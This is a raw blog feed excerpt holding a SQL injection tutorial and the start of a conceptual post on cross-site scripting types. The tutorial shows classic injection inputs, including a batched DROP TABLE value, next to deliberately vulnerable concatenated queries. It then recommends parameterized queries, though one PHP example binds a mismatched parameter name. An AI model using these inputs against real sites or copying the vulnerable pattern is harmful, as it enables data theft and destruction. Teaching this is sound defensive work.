&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The SQL statement above is much the same as this:&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
SELECT UserId, Name, Password FROM Users WHERE UserId = 105 or 1=1&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
A smart hacker might get access to all the user names and passwords in a database by simply inserting 105 or 1=1 into the input box.&lt;/div&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
SQL Injection Based on&amp;nbsp;&quot;&quot;=&quot;&quot; is Always True&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Here is a common construction, used to verify user login to a web site:&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
User Name:&lt;br /&gt;&lt;input name=&quot;uName&quot; style=&quot;font-size: 12.800000190734863px;&quot; type=&quot;text&quot; value=&quot;&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Password:&lt;br /&gt;&lt;input name=&quot;uPass&quot; style=&quot;font-size: 12.800000190734863px;&quot; type=&quot;text&quot; value=&quot;&quot; /&gt;&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Server Code&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
uName = getRequestString(&quot;UserName&quot;);&lt;br /&gt;uPass = getRequestString(&quot;UserPass&quot;);&lt;br /&gt;&lt;br /&gt;sql = &quot;SELECT * FROM Users WHERE Name =&#39;&quot; + uName + &quot;&#39; AND Pass =&#39;&quot; + uPass + &quot;&#39;&quot;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
A smart hacker might get access to user names and passwords&amp;nbsp;in a database by simply inserting &quot; or &quot;&quot;=&quot; into the user name or password text box.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The code at the server will create a valid SQL statement like this:&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Result&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
SELECT * FROM Users WHERE Name =&quot;&quot; or &quot;&quot;=&quot;&quot; AND Pass =&quot;&quot; or &quot;&quot;=&quot;&quot;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The result SQL is valid. It will return all rows from the table Users, since&amp;nbsp;&lt;strong&gt;WHERE &quot;&quot;=&quot;&quot;&lt;/strong&gt;&amp;nbsp;is always true.&lt;/div&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
SQL Injection Based on Batched SQL&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Most databases support batched SQL statement, separated by semicolon.&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Example&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
SELECT * FROM Users; DROP TABLE Suppliers&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The SQL above will return all rows in the Customers table, and then delete the table called Suppliers.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
If we had the following server code:&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Server Code&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtUserId = getRequestString(&quot;UserId&quot;);&lt;br /&gt;txtSQL = &quot;SELECT * FROM Users WHERE UserId = &quot; + txtUserId;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
And the following input:&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
User id:&lt;br /&gt;&lt;input name=&quot;UserId&quot; style=&quot;font-size: 12.800000190734863px; width: 500px;&quot; type=&quot;text&quot; value=&quot;105; DROP TABLE Suppliers&quot; /&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The code at the server would create a valid SQL statement like this:&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Result&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
SELECT * FROM Users WHERE UserId = 105; DROP TABLE Suppliers&lt;/div&gt;
&lt;/div&gt;
&lt;br style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px;&quot; /&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
Parameters for Protection&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Some web developers use a &quot;blacklist&quot; of words or characters to search for in SQL input, to prevent SQL injection attacks.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
This is not a very good idea. Many of these words (like delete or drop) and characters (like semicolons and quotation marks), are used in common language, and should be allowed in many types of input.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
(In fact it should be perfectly legal to input an SQL statement in a database field.)&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The only proven way to protect a web site from SQL injection attacks, is to use SQL parameters.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
SQL parameters are values that are added to an SQL query at execution time, in a controlled manner.&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
ASP.NET Razor Example&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtUserId = getRequestString(&quot;UserId&quot;);&lt;br /&gt;txtSQL = &quot;SELECT * FROM Users WHERE UserId = @0&quot;;&lt;br /&gt;db.Execute(txtSQL,txtUserId);&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
Note that parameters are represented in the SQL statement by a @ marker.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The SQL engine checks each parameter to ensure that it is the correct for its column, and are treated literally, and not as part of the SQL to be executed.&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;h2 class=&quot;example&quot; style=&quot;background-color: transparent; color: #617f10; font-size: 14px; font-weight: normal; margin-bottom: 10px; margin-top: 0px;&quot;&gt;
Another Example&lt;/h2&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtNam = getRequestString(&quot;CustomerName&quot;);&lt;br /&gt;txtAdd = getRequestString(&quot;Address&quot;);&lt;br /&gt;txtCit = getRequestString(&quot;City&quot;);&lt;br /&gt;txtSQL = &quot;INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)&quot;;&lt;br /&gt;db.Execute(txtSQL,txtNam,txtAdd,txtCit);&lt;/div&gt;
&lt;/div&gt;
&lt;br style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px;&quot; /&gt;
&lt;table class=&quot;lamp&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; padding: 0px; width: 820px;&quot;&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;th style=&quot;color: black; font-size: 12.800000190734863px; padding: 10px 5px 10px 10px; width: 34px;&quot;&gt;&lt;img alt=&quot;Note&quot; src=&quot;http://www.w3schools.com/images/lamp.jpg&quot; style=&quot;border: 0px; height: 32px; width: 32px;&quot; /&gt;&lt;/th&gt;&lt;td style=&quot;font-size: 12.800000190734863px; line-height: 16.899999618530273px; padding: 4px 10px 4px 0px;&quot;&gt;You have just learned to avoid SQL injection. One of the top website vulnerabilities.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px;&quot; /&gt;
&lt;hr style=&quot;background-color: #d4d4d4; border: 0px; clear: both; color: #d4d4d4; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; height: 1px;&quot; /&gt;
&lt;h2 style=&quot;background-color: white; font-family: verdana, helvetica, arial, sans-serif; font-size: 22px; font-weight: normal; margin-bottom: 10px; margin-top: 10px;&quot;&gt;
Examples&lt;/h2&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
The following examples shows how to build parameterized queries in some common web languages.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
ASP.NET SELECT&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtUserId = getRequestString(&quot;UserId&quot;);&lt;br /&gt;sql = &quot;SELECT * FROM Customers WHERE CustomerId = @0&quot;;&lt;br /&gt;command = new SqlCommand(sql);&lt;br /&gt;command.Parameters.AddWithValue(&quot;@0&quot;,txtUserID);&lt;br /&gt;command.ExecuteReader();&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
ASP.NET INSERT INTO&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
txtNam = getRequestString(&quot;CustomerName&quot;);&lt;br /&gt;txtAdd = getRequestString(&quot;Address&quot;);&lt;br /&gt;txtCit = getRequestString(&quot;City&quot;);&lt;br /&gt;txtSQL = &quot;INSERT INTO Customers (CustomerName,Address,City) Values(@0,@1,@2)&quot;;&lt;br /&gt;command = new SqlCommand(txtSQL);&lt;br /&gt;command.Parameters.AddWithValue(&quot;@0&quot;,txtNam);&lt;br /&gt;command.Parameters.AddWithValue(&quot;@1&quot;,txtAdd);&lt;br /&gt;command.Parameters.AddWithValue(&quot;@2&quot;,txtCit);&lt;br /&gt;command.ExecuteNonQuery();&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #404040; font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; line-height: 16.899999618530273px;&quot;&gt;
PHP INSERT INTO&lt;/div&gt;
&lt;div class=&quot;example&quot; style=&quot;background-color: #e5eecc; background-image: linear-gradient(rgb(255, 255, 255), rgb(229, 238, 204) 100px); border: 1px solid rgb(212, 212, 212); font-family: verdana, helvetica, arial, sans-serif; font-size: 12.800000190734863px; margin: 0px; padding: 5px; width: auto;&quot;&gt;
&lt;div class=&quot;example_code notranslate&quot; style=&quot;background-color: white; border: 1px solid rgb(212, 212, 212); font-family: &#39;courier new&#39;; font-size: 14px; padding: 5px; width: auto;&quot;&gt;
$stmt = $dbh-&amp;gt;prepare(&quot;INSERT INTO Customers (CustomerName,Address,City)&lt;br /&gt;VALUES (:nam, :add, :cit)&quot;);&lt;br /&gt;$stmt-&amp;gt;bindParam(&#39;:nam&#39;, $txtNam);&lt;br /&gt;$stmt-&amp;gt;bindParam(&#39;:val&#39;, $txtAdd);&lt;br /&gt;$stmt-&amp;gt;bindParam(&#39;:cit&#39;, $txtCit);&lt;br /&gt;$stmt-&amp;gt;execute();&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://gouravinfo.blogspot.com/feeds/842650351942799675/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://gouravinfo.blogspot.com/2014/01/sql-injection-attack.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/842650351942799675'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/276484908558385294/posts/default/842650351942799675'/><link rel='alternate' type='text/html' href='http://gouravinfo.blogspot.com/2014/01/sql-injection-attack.html' title='SQL Injection Attack'/><author><name>Gourav Ratnawat</name><uri>http://www.blogger.com/profile/03815155318390279322</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIZoLmC65AXKrNABnNfxhzeowPYCsr93DX9SQDkIH_2SEiHQddadPoboFvNG0_zEDxj6lGmengwWk33scEp3cO0HegFS-kxERyTDTOrM2tMtgbhtE_4_a7jORklx4yVGs/s220/FB_IMG_1557336607561.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-276484908558385294.post-6065932301297018479</id><published>2014-01-04T10:22:00.002+05:30</published><updated>2014-01-07T14:45:01.047+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Applications"/><category scheme="http://www.blogger.com/atom/ns#" term="Ethical Hacking"/><category scheme="http://www.blogger.com/atom/ns#" term="Windows"/><title type='text'>Cross-site Scripting XSS Attacks</title><content type='html'>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;
&lt;span style=&quot;color: lime;&quot;&gt;&lt;b style=&quot;background-color: white; font-family: georgia, serif; font-size: 13px;&quot;&gt;&#39;XSS&#39; also known as &#39;CSS&#39;&lt;/b&gt;&lt;b style=&quot;background-color: white; font-family: georgia, serif; font-size: 13px;&quot;&gt;&amp;nbsp;- Cross Site Scripting&lt;/b&gt;&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: georgia, serif; font-size: 13px;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;It is a very common vulnerability&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;found in Web Applications, &#39;XSS&#39; allows the attacker to INSERT malicous code, There are many types of XSS attacks, I will mention 3 of the most used. This kind of vulnerability allows an &quot;attacker&quot; to inject some code into the applications affected in order to bypass access to the website or to apply&amp;nbsp; &quot;phishing&quot; on falls users.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;This technique is also used for website Hacking.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Types of XSS:&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;There are actually three types of Cross-Site Scripting, commonly named as:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;ol style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;
&lt;li&gt;&lt;b&gt;DOM-Based XSS&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Non-persistent XSS&lt;/b&gt;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Persistent XSS&lt;/b&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;DOM-Based :&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;The DOM-Based Cross-Site Scripting allow to an attacker to work not on a victim website but on a victim local machine: the various operative system usually includes &quot;since born&quot; some HTML pages created for differents aims, but as long as the humans do mistakes this HTML pages often can be exploited due to code vulnerabilities.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;The DOM-Based XSS exploits these problems on users local machines in this way:&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The attacker creates a well builded malicious website&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The ingenuous user opens that site&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The user has a vulnerable page on his machine&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The attacker&#39;s website sends commands to the vulnerable HTML page&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The vulnerable local page execute that commands with the user&#39;s privileges&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp; on that machine.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;- The attacker easily gain control on the victim computer.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Non-Persistent :&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;The non-persistent XSS are actually the most commons vulnerabilities that can be found on the Net. It&#39;s commonly named as &quot;non-persistent&quot; because it works on an immediate HTTP response from the victim website: it show up when the webpage get the data provided by the attacker&#39;s client to automatically generate a result page for the attackers himself. Standing on this the attacker could provide some malicious code and try to make the server execute it in order to obtain some result.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;The most common applying of this kind of vulnerability is in Search engines in website: the attacker writes some arbitrary HTML code in the search textbox and, if the website&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;is vulnerable, the result page will return the result of these HTML entities.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;Persistent :&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;The persistent XSS vulnerabilities are similar to the second type (Non-persistent XSS), because both works on a victim site and tries to hack users informations and the difference is that in websites vulnerables to Persistent XSS the attacker doesn&#39;t need to&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;provide the crafted url to the users, because the website itself permits to users to insert fixed data into the system: this is the case for example of &quot;guestbooks&quot;. Usually the users uses&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;that kind of tool to leave messages to the owned&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;of the website and at a first look it doesn&#39;t seems something dangerous, but if an&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;attacker discover that the system is vulnerable can insert some malicious code in his&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&amp;nbsp;message and let ALL visitors to be victim of that.&lt;/span&gt;&lt;br /&gt;
&lt;br style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;This works when the tool provided (the guestbook in the example) doesn&#39;t do any&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;check on the content of the inserted message: it just inserts the data provided from&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;the user into the result page.&lt;/span&gt;&lt;br /&gt;
&lt;hr size=&quot;2&quot; style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot; width=&quot;100%&quot; /&gt;
&lt;b style=&quot;background-color: white; font-family: Arial, Verdana, sans-serif; font-size: 13px;&quot;&gt;&lt;br /&gt;&lt;span style=&quot;font-family: georgia, serif;&quot;&gt;How to Find XSS Vulnerabilities:-&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
